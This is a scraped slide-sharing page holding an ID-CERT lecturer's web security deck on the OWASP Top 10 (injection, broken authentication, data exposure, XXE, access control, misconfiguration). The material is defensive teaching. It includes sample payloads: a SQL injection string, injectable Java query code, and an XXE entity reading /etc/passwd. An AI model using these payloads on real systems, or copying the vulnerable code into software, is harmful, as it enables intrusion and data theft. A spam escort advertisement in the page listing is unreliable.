How to Test for The OWASP Top TenSecurity Innovation
 
Web and Mobile Application Security
Web and Mobile Application SecurityWeb and Mobile Application Security
Web and Mobile Application SecurityPrateek Jain
 
OWASP, Application Security
OWASP, Application Security OWASP, Application Security
OWASP, Application Security Dilip Sharma
 
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...Michael Pirnat
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelinesZakaria SMAHI
 
attack vectors by chimwemwe.pptx
attack vectors by chimwemwe.pptxattack vectors by chimwemwe.pptx
attack vectors by chimwemwe.pptxJenetSilence
 
How to Destroy a Database
How to Destroy a DatabaseHow to Destroy a Database
How to Destroy a DatabaseJohn Ashmead
 
Ethical hacking and social engineering
Ethical hacking and social engineeringEthical hacking and social engineering
Ethical hacking and social engineeringSweta Kumari Barnwal
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...IBM Security
 
Ethical Hacking justvamshi .pptx
Ethical Hacking justvamshi .pptxEthical Hacking justvamshi .pptx
Ethical Hacking justvamshi .pptxvamshimatangi
 
Secure Coding BSSN Semarang Material.pdf
Secure Coding BSSN Semarang Material.pdfSecure Coding BSSN Semarang Material.pdf
Secure Coding BSSN Semarang Material.pdfnanangAris1
 
Lock it Down: Access Control for IBM i
Lock it Down: Access Control for IBM iLock it Down: Access Control for IBM i
Lock it Down: Access Control for IBM iPrecisely
 
owasp features in secure coding techniques
owasp features in secure coding techniquesowasp features in secure coding techniques
owasp features in secure coding techniquesSri Latha
 
Engineering Software Products: 7. security and privacy
Engineering Software Products: 7. security and privacyEngineering Software Products: 7. security and privacy
Engineering Software Products: 7. security and privacysoftware-engineering-book
 
Expand Your Control of Access to IBM i Systems and Data
Expand Your Control of Access to IBM i Systems and DataExpand Your Control of Access to IBM i Systems and Data
Expand Your Control of Access to IBM i Systems and DataPrecisely
 
Web Security Overview
Web Security OverviewWeb Security Overview
Web Security OverviewNoah Jaehnert
 

Similar to Web security uploadv1 (20)

Ethical hacking
Ethical hacking Ethical hacking
Ethical hacking
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
 
Web and Mobile Application Security
Web and Mobile Application SecurityWeb and Mobile Application Security
Web and Mobile Application Security
 
OWASP, Application Security
OWASP, Application Security OWASP, Application Security
OWASP, Application Security
 
Cyber Security # Lec 5
Cyber Security # Lec 5Cyber Security # Lec 5
Cyber Security # Lec 5
 
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
 
attack vectors by chimwemwe.pptx
attack vectors by chimwemwe.pptxattack vectors by chimwemwe.pptx
attack vectors by chimwemwe.pptx
 
Module 3-cyber security
Module 3-cyber securityModule 3-cyber security
Module 3-cyber security
 
How to Destroy a Database
How to Destroy a DatabaseHow to Destroy a Database
How to Destroy a Database
 
Ethical hacking and social engineering
Ethical hacking and social engineeringEthical hacking and social engineering
Ethical hacking and social engineering
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
 
Ethical Hacking justvamshi .pptx
Ethical Hacking justvamshi .pptxEthical Hacking justvamshi .pptx
Ethical Hacking justvamshi .pptx
 
Cybersecurity update 12
Cybersecurity update 12Cybersecurity update 12
Cybersecurity update 12
 
Secure Coding BSSN Semarang Material.pdf
Secure Coding BSSN Semarang Material.pdfSecure Coding BSSN Semarang Material.pdf
Secure Coding BSSN Semarang Material.pdf
 
Lock it Down: Access Control for IBM i
Lock it Down: Access Control for IBM iLock it Down: Access Control for IBM i
Lock it Down: Access Control for IBM i
 
owasp features in secure coding techniques
owasp features in secure coding techniquesowasp features in secure coding techniques
owasp features in secure coding techniques
 
Engineering Software Products: 7. security and privacy
Engineering Software Products: 7. security and privacyEngineering Software Products: 7. security and privacy
Engineering Software Products: 7. security and privacy
 
Expand Your Control of Access to IBM i Systems and Data
Expand Your Control of Access to IBM i Systems and DataExpand Your Control of Access to IBM i Systems and Data
Expand Your Control of Access to IBM i Systems and Data
 
Web Security Overview
Web Security OverviewWeb Security Overview
Web Security Overview
 

More from Setia Juli Irzal Ismail

Panduan Proyek Akhir D3 Teknologi Komputer Telkom University
Panduan Proyek Akhir D3 Teknologi Komputer Telkom UniversityPanduan Proyek Akhir D3 Teknologi Komputer Telkom University
Panduan Proyek Akhir D3 Teknologi Komputer Telkom UniversitySetia Juli Irzal Ismail
 

More from Setia Juli Irzal Ismail (20)

slide-share.pdf
slide-share.pdfslide-share.pdf
slide-share.pdf
 
slide-lp3i-final.pdf
slide-lp3i-final.pdfslide-lp3i-final.pdf
slide-lp3i-final.pdf
 
society50-jul-share.pdf
society50-jul-share.pdfsociety50-jul-share.pdf
society50-jul-share.pdf
 
57 slide presentation
57 slide presentation57 slide presentation
57 slide presentation
 
Panduan Proyek Akhir D3 Teknologi Komputer Telkom University
Panduan Proyek Akhir D3 Teknologi Komputer Telkom UniversityPanduan Proyek Akhir D3 Teknologi Komputer Telkom University
Panduan Proyek Akhir D3 Teknologi Komputer Telkom University
 
Sosialisasi kurikulum2020
Sosialisasi kurikulum2020Sosialisasi kurikulum2020
Sosialisasi kurikulum2020
 
Welcoming maba 2020
Welcoming maba 2020Welcoming maba 2020
Welcoming maba 2020
 
Slide jul apcert agm 2016
Slide jul apcert agm 2016Slide jul apcert agm 2016
Slide jul apcert agm 2016
 
Tugas besar MK Keamanan Jaringan
Tugas besar MK Keamanan Jaringan Tugas besar MK Keamanan Jaringan
Tugas besar MK Keamanan Jaringan
 
02 teknik penyerangan
02 teknik penyerangan02 teknik penyerangan
02 teknik penyerangan
 
01a pengenalan keamanan jaringan upload
01a pengenalan keamanan jaringan upload01a pengenalan keamanan jaringan upload
01a pengenalan keamanan jaringan upload
 
Kajian3 upload
Kajian3 uploadKajian3 upload
Kajian3 upload
 
1.pendahuluan sistem operasi
1.pendahuluan sistem operasi1.pendahuluan sistem operasi
1.pendahuluan sistem operasi
 
10 tk3193-ids
10 tk3193-ids10 tk3193-ids
10 tk3193-ids
 
09 vpn
09 vpn 09 vpn
09 vpn
 
17. representasi data 5 jul
17. representasi data 5 jul17. representasi data 5 jul
17. representasi data 5 jul
 
16. representasi data 4 jul
16. representasi data 4 jul16. representasi data 4 jul
16. representasi data 4 jul
 
15. representasi data 3 jul2
15. representasi data 3 jul215. representasi data 3 jul2
15. representasi data 3 jul2
 
Latihan6
Latihan6Latihan6
Latihan6
 
14. representasi data 2 upload
14. representasi data 2 upload14. representasi data 2 upload
14. representasi data 2 upload
 

Recently uploaded

Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3JemimahLaneBuaron
 
Introduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsIntroduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsTechSoup
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactPECB
 
Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104misteraugie
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Sapana Sha
 
Web & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdfWeb & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdfJayanti Pande
 
The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13Steve Thomason
 
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...EduSkills OECD
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityGeoBlogs
 
Accessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impactAccessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impactdawncurless
 
A Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformA Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformChameera Dedduwage
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfagholdier
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfciinovamais
 
Sanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfSanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfsanyamsingh5019
 
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...christianmathematics
 
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxiammrhaywood
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdfQucHHunhnh
 
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...Sapna Thakur
 
General AI for Medical Educators April 2024
General AI for Medical Educators April 2024General AI for Medical Educators April 2024
General AI for Medical Educators April 2024Janet Corral
 

Recently uploaded (20)

Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3
 
Introduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsIntroduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The Basics
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global Impact
 
Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
 
Web & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdfWeb & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdf
 
The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13
 
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activity
 
Accessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impactAccessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impact
 
A Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformA Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy Reform
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdf
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdf
 
Sanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfSanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdf
 
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
 
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf
 
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
 
Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1
 
General AI for Medical Educators April 2024
General AI for Medical Educators April 2024General AI for Medical Educators April 2024
General AI for Medical Educators April 2024
 

Web security uploadv1

  • 1. Web Security A guide to securing your web Setia Juli Irzal Ismail ID-CERT – Telkom University
  • 2. Content • Introduction • Web Security Case • OWASP Top 10 • Basic Web Security Standard • Web Security Technology • Discussion
  • 3. Introduction • Setia Juli Irzal Ismail • Jul Ismail • Malware Analyst – ID-CERT • Lecturer – Telkom University www.cert.or.id/
  • 4. ID-CERT • Indonesia Computer Emergency Response Team • 1998 – Dr. Budi Rahardjo • Community based • Incident Handling • Malware Lab • Research & Training about Malware • Tools: Malware Scanner • Founder AP-CERT: JP-CERT & AusCERT www.cert.or.id/
  • 6. • 30,000 websites are hacked everyday • hundred of free tools available in internet for hacking a website • 70% attack come through web app • Web vulnerability www.cert.or.id/
  • 7. • SQL injection sony attack LulzSec • Leaked 77 million user data • 1 month shutdown • $171 million
  • 8. • CSS vulnerability Android Market • Allow attacker to remotely install apps onto user android device www.cert.or.id/
  • 9. We Are Secure, We Have a Firewall • Myth about Firewall • Closed off ports
  • 10. Impact • Deface • Install malware, botnet • Take over
  • 12. OWASP
  • 13. Owasp top 10 • Open Web Application Security Project • Open souce project à improving web application security • Individual Contributor, Company Sponsor, Volunteer • Secure Coding, library • Tools, scanner, vulnerable lab • Top Ten List
  • 14. OWASP Top Ten • 2004 • 2007 • 2010 • 2013 • 2017 www.cert.or.id/
  • 16. 1. Injection • SQL, LDAP, XPath, or NoSQL queries, OS commands, XML parsers, SMTP headers, expression languages, and ORM queries. • occur when untrusted data is sent to an interpreter as part of a command or query. • The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization
  • 17. Injection • Injection flaws are easy to discover when examining code. • Scanners and fuzzers can help attackers find injection flaws. • Injection can result in data loss, corruption, or disclosure to unauthorized parties, loss of accountability, or denial of access. • Injection can sometimes lead to complete host takeover. www.cert.or.id/
  • 18. An application is vulnerable to attack when ? • User-supplied data is not validated, filtered, or sanitized by the application. • Dynamic queries or non-parameterized calls without context- aware escaping are used directly in the interpreter. • Hostile data is used within object-relational mapping (ORM) search parameters to extract additional, sensitive records. • Hostile data is directly used or concatenated, such that the SQL or command contains both structure and hostile data in dynamic queries, commands, or stored procedures.
  • 19. Defense • Source code review • automated testing of all parameters, headers, URL, cookies, JSON, SOAP, and XML data inputs • static source (SAST) and dynamic application test (DAST) tools into the CI/CD pipeline www.cert.or.id/
  • 20. How to Prevent • use a safe API • avoids the use of the interpreter entirely or provides a parameterized interface, or migrate to use Object Relational Mapping Tools (ORMs) • Use positive or "whitelist" server-side input validation. • For any residual dynamic queries, escape special characters using the specific escape syntax for that interpreter. • Use LIMIT and other SQL controls within queries to prevent mass disclosure of records in case of SQL injection.
  • 21. Example Attack Scenarios • Scenario #1: An application uses untrusted data in the construction of the following vulnerable SQL call: • String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'"; • Scenario #2: Similarly, an application’s blind trust in frameworks may result in queries that are still vulnerable, (e.g. Hibernate Query Language (HQL)): • Query HQLQuery = session.createQuery("FROM accounts WHERE custID='" + request.getParameter("id") + "'"); www.cert.or.id/
  • 22. Attack • In both cases, the attacker modifies the ‘id’ parameter value in their browser to send: ' or '1'='1. For example: • http://example.com/app/accountView?id=' or '1'='1 • This changes the meaning of both queries to return all the records from the accounts table. • More dangerous attacks could modify or delete data, or even invoke stored procedures.
  • 24. 2. Broken Authentication • Attackers have access to hundreds of millions of valid username and password combinations for credential stuffing, default administrative account lists, automated brute force, and dictionary attack tools. • Session management attacks are well understood, particularly in relation to unexpired session tokens. • The prevalence of broken authentication is widespread due to the design and implementation of most identity and access controls. • Session management is the bedrock of authentication and access controls, and is present in all stateful applications. www.cert.or.id/
  • 25. Broken Authentication • Attackers can detect broken authentication using manual means • Exploit them using automated tools with password lists and dictionary attacks. • Attackers have to gain access to only a few accounts, or just one admin account to compromise the system. • Depending on the domain of the application, this may allow money laundering, social security fraud, and identity theft, or disclose legally protected highly sensitive information.
  • 26. Is the Application Vulnerable? • Permits automated attacks such as credential stuffing, where the attacker has a list of valid usernames and passwords. • Permits brute force or other automated attacks. • Permits default, weak, or well known passwords, such as "Password1" or "admin/admin“. • Uses weak or ineffective credential recovery and forgot- password processes, such as "knowledge-based answers", which cannot be made safe. www.cert.or.id/
  • 27. Broken Authentication Vulnerable • Uses plain text, encrypted, or weakly hashed passwords (see A3:2017-Sensitive Data Exposure). • Has missing or ineffective multi-factor authentication. • Exposes Session IDs in the URL (e.g., URL rewriting). • Does not rotate Session IDs after successful login. • Does not properly invalidate Session IDs. User sessions or • authentication tokens (particularly single sign-on (SSO) tokens) aren’t properly invalidated during logout or a period of inactivity.
  • 28. How to Prevent • Multi-factor authentication to prevent automated, credential stuffing, brute force, and stolen credential re-use attacks. • Do not ship or deploy with any default credentials, particularly for admin users. • Implement weak-password checks, such as testing new or changed passwords against a list of the top 10000 worst passwords. www.cert.or.id/
  • 29. Defense • Align password length, complexity and rotation policies • NIST 800-63 B's guidelines in section 5.1.1 for Memorized Secrets or other modern, evidence based password policies. • Ensure registration, credential recovery, and API pathways are hardened against account enumeration attacks by using the same messages for all outcomes. • Limit or increasingly delay failed login attempts. Log all failures and alert administrators when credential stuffing, brute force, or other attacks are detected. • Use a server-side, secure, built-in session manager that generates a new random session ID with high entropy after login. Session IDs should not be in the URL, be securely stored and invalidated after logout, idle, and absolute timeouts.
  • 30. Example Attack Scenarios • Scenario #1: Credential stuffing, the use of lists of known passwords, is a common attack. • If an application does not implement automated threat or credential stuffing protections, the application can be used as a password oracle to determine if the credentials are valid. • Scenario #2: Most authentication attacks occur due to the continued use of passwords as a sole factor. • Once considered best practices, password rotation and complexity requirements are viewed as encouraging users to use, and reuse, weak passwords. Organizations are recommended to stop these practices per NIST 800-63 and use multi-factor authentication. www.cert.or.id/
  • 31. Attack • Scenario #3: Application session timeouts aren’t set properly. • A user uses a public computer to access an application. • Instead of selecting “logout” the user simply closes the browser tab and walks away. • An attacker uses the same browser an hour later, and the user is still authenticated.
  • 32. 3. Sensitive Data Exposure OWASP Top 10
  • 33. 3. Sensitive Data Exposure • Rather than directly attacking crypto, attackers steal keys, execute man-in- the-middle attacks, or steal clear text data off the server, while in transit, or from the user’s client, e.g. browser. • A manual attack is generally required. • Previously retrieved password databases could be brute forced by Graphics Processing Units (GPUs) • The most common flaw is simply not encrypting sensitive data. • When crypto is employed, weak key generation and management, and weak algorithm, protocol and cipher usage is common, particularly for weak password hashing storage techniques. www.cert.or.id/
  • 34. Sensitive Data Exposure • For data in transit, server side weaknesses are mainly easy to detect, but hard for data at rest. • Failure frequently compromises all data that should have been protected. • Typically, this information includes sensitive personal information (PII) data such as health records, credentials, personal data, and credit cards,
  • 35. Is the Application Vulnerable? • Is any data transmitted in clear text? • HTTP, SMTP, and FTP. • External internet traffic is especially dangerous. Verify all internal traffic e.g. between load balancers, web servers, or back-end systems. • Is sensitive data stored in clear text, including backups? • Are any old or weak cryptographic algorithms used? www.cert.or.id/
  • 36. Is the Application Vulnerable? • Are default crypto keys in use, weak crypto keys generated or re-used, or is proper key management or rotation missing? • Is encryption not enforced, e.g. are any user agent (browser) security directives or headers missing? • Does the user agent (e.g. app, mail client) not verify if the received server certificate is valid?
  • 37. How to Prevent • Classify data processed, stored, or transmitted by an application. Identify which data is sensitive according to privacy laws, regulatory requirements, or business needs. • Apply controls as per the classification. • Don’t store sensitive data unnecessarily. Discard it as soon as possible or use PCI DSS compliant tokenization or even truncation. Data that is not retained cannot be stolen. • Make sure to encrypt all sensitive data at rest. • Ensure up-to-date and strong standard algorithms, protocols, and keys are in place; use proper key management. www.cert.or.id/
  • 38. How to Prevent • Encrypt all data in transit with secure protocols such as TLS with perfect forward secrecy (PFS) ciphers, cipher prioritization by the server, and secure parameters. Enforce encryption using directives like HTTP Strict Transport Security (HSTS). • Disable caching for responses that contain sensitive data. • Store passwords using strong adaptive and salted hashing functions with a work factor (delay factor), such as Argon2, scrypt, bcrypt, or PBKDF2. • Verify independently the effectiveness of configuration and settings.
  • 39. Example Attack Scenarios • Scenario #1: An application encrypts credit card numbers in a database using automatic database encryption. • However, this data is automatically decrypted when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. www.cert.or.id/
  • 40. Scenario #2 • A site doesn't use or enforce TLS for all pages or supports weak encryption. • An attacker monitors network traffic (e.g. at an insecure wireless network), • downgrades connections from HTTPS to HTTP, • intercepts requests, and steals the user's session cookie. • The attacker then replays this cookie and hijacks the user's (authenticated) session, accessing or modifying the user's private data. Instead of the above they could alter all transported data, e.g. the recipient of a money transfer.
  • 41. Scenario #3: • The password database uses unsalted or simple hashes to store everyone's passwords. • A file upload flaw allows an attacker to retrieve the password database. • All the unsalted hashes can be exposed with a rainbow table of pre- calculated hashes. • Hashes generated by simple or fast hash functions may be cracked by GPUs, even if they were salted. www.cert.or.id/
  • 42. 4. XML External Entity OWASP Top 10
  • 43. XML External Entities (XXE) • Attackers can exploit vulnerable XML processors if • they can upload XML • include hostile content in an XML document, • exploiting vulnerable code, dependencies or integrations.
  • 44. XML External Entities (XXE) • By default, many older XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. • These flaws can be used to: • extract data, • execute a remote request from the server, • scan internal systems, • perform a denial-of-service attack www.cert.or.id/
  • 45. Is the Application Vulnerable? • The application accepts XML directly or XML uploads, especially from untrusted sources, or inserts untrusted data into XML documents, which is then parsed by an XML processor. • Any of the XML processors in the application or SOAP based web services has document type definitions (DTDs) enabled. As the exact mechanism for disabling DTD processing varies by processor, it is good practice to consult a reference such as the OWASP Cheat Sheet 'XXE Prevention’.
  • 46. XML External Entities (XXE) • If your application uses SAML for identity processing within federated security or single sign on (SSO) purposes. SAML uses XML for identity assertions, and may be vulnerable. • If the application uses SOAP prior to version 1.2, it is likely susceptible to XXE attacks if XML entities are being passed to the SOAP framework. • Being vulnerable to XXE attacks likely means that the application is vulnerable to denial of service attacks including the Billion Laughs attack. www.cert.or.id/
  • 47. How to Prevent • use less complex data formats such as JSON • avoide serialization of sensitive data. • Patch or upgrade all XML processors and libraries in use by the application or on the underlying operating system. • Use dependency checkers. • Update SOAP to SOAP 1.2 or higher. • Disable XML external entity and DTD processing in all XML parsers in the application
  • 48. How to Prevent • Implement positive ("whitelisting") server-side input validation, filtering, or sanitization to prevent hostile data within XML documents, headers, or nodes. • Verify that XML or XSL file upload functionality validates incoming XML using XSD validation or similar. • Virtual patching, API security gateways, or Web Application Firewalls (WAFs) www.cert.or.id/
  • 49. Example Attack Scenarios • The attacker attempts to extract data from the server: <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo> <!ENTITY xxe SYSTEM "https://192.168.1.1/private" >]> --PrivateNet <!ENTITY xxe SYSTEM "file:///dev/random" >]> -- DDoS
  • 50. 5. Broken Access Control OWASP Top 10
  • 51. Broken Access Control • Access control enforces policy such that users cannot act outside of their intended permissions. • Manual testing is the best way to detect missing or ineffective access control, including HTTP method (GET vs PUT, etc), controller, direct object references, • attackers acting as users or administrators, or users using privileged functions, or creating, accessing, updating or deleting every record. www.cert.or.id/
  • 52. Broken Access Control • Bypassing access control checks by modifying the URL, internal application state, or the HTML page, or simply using a custom API attack tool. • Allowing the primary key to be changed to another users record, permitting viewing or editing someone else's account. • Elevation of privilege. Acting as a user without being logged in, or acting as an admin when logged in as a user.
  • 53. Broken Access Control • Metadata manipulation, such as replaying or tampering with a JSON Web Token (JWT) access control token or a cookie or hidden field manipulated to elevate privileges, or abusing JWT invalidation • CORS misconfiguration allows unauthorized API access. • Force browsing to authenticated pages as an unauthenticated user or to privileged pages as a standard user. Accessing API with missing access controls for POST, PUT and DELETE. www.cert.or.id/
  • 54. How to Prevent • trusted server-side code or server-less API • With the exception of public resources, deny by default. • Implement access control mechanisms once and reuse them throughout the application, including minimizing CORS usage. • Model access controls should enforce record ownership, rather than accepting that the user can create, read, update, or delete any record. • Unique application business limit requirements should be enforced by domain models. •
  • 55. Prevention • Disable web server directory listing and ensure file metadata (e.g. .git) and backup files are not present within web roots. • Log access control failures, alert admins when appropriate (e.g. repeated failures). • Rate limit API and controller access to minimize the harm from automated attack tooling. • JWT tokens should be invalidated on the server after logout www.cert.or.id/
  • 56. Example Attack Scenarios • Scenario #1: The application uses unverified data in a SQL call that is accessing account information: • pstmt.setString(1, request.getParameter("acct")); • ResultSet results = pstmt.executeQuery( ); • An attacker simply modifies the 'acct' parameter in the browser to send whatever account number they want. If not properly verified, the attacker can access any user's account. • http://example.com/app/accountInfo?acct=notmyacct
  • 57. Attack Scenario • Scenario #2: An attacker simply force browses to target URLs. • Admin rights are required for access to the admin page. • http://example.com/app/getappInfo http://example.com/app/admin_getappInfo • If an unauthenticated user can access either page, it’s a flaw. • If a non-admin can access the admin page, this is a flaw. www.cert.or.id/
  • 59. Security Misconfiguration • unpatched flaws • access default accounts, • unused pages, • unprotected files and directories, etc • to gain unauthorized access or knowledge of the system.
  • 60. Can happen in • network services, platform, web server, application server, database, frameworks, custom code, and pre-installed virtual machines, containers, or storage. • Automated scanners are useful for detecting misconfigurations, use of default accounts or configurations, unnecessary services, legacy options, etc. • give attackers unauthorized access to some system data or functionality. • Occasionally, such flaws result in a complete system compromise. www.cert.or.id/
  • 61. Is the Application Vulnerable? • Missing appropriate security hardening across any part of the application stack, or improperly configured permissions on cloud services. • Unnecessary features are enabled or installed (e.g. unnecessary ports, services, pages, accounts, or privileges). • Default accounts and their passwords still enabled and unchanged. • Error handling reveals stack traces or other overly informative error messages to users.
  • 62. Is the Application Vulnerable? • upgraded systems, latest security features are disabled or not configured securely. • The security settings in the application servers, application frameworks (e.g. Struts, Spring, ASP.NET), libraries, databases, etc. not set to secure values. • The server does not send security headers or directives or they are not set to secure values. • The software is out of date or vulnerable www.cert.or.id/
  • 63. How to Prevent • A repeatable hardening process that makes it fast and easy to deploy another environment that is properly locked down. Development, QA, and production environments should all be configured identically, with different credentials used in each environment. This process should be automated to minimize the effort required to setup a new secure environment. • A minimal platform without any unnecessary features, components, documentation, and samples. Remove or do not install unused features and frameworks.
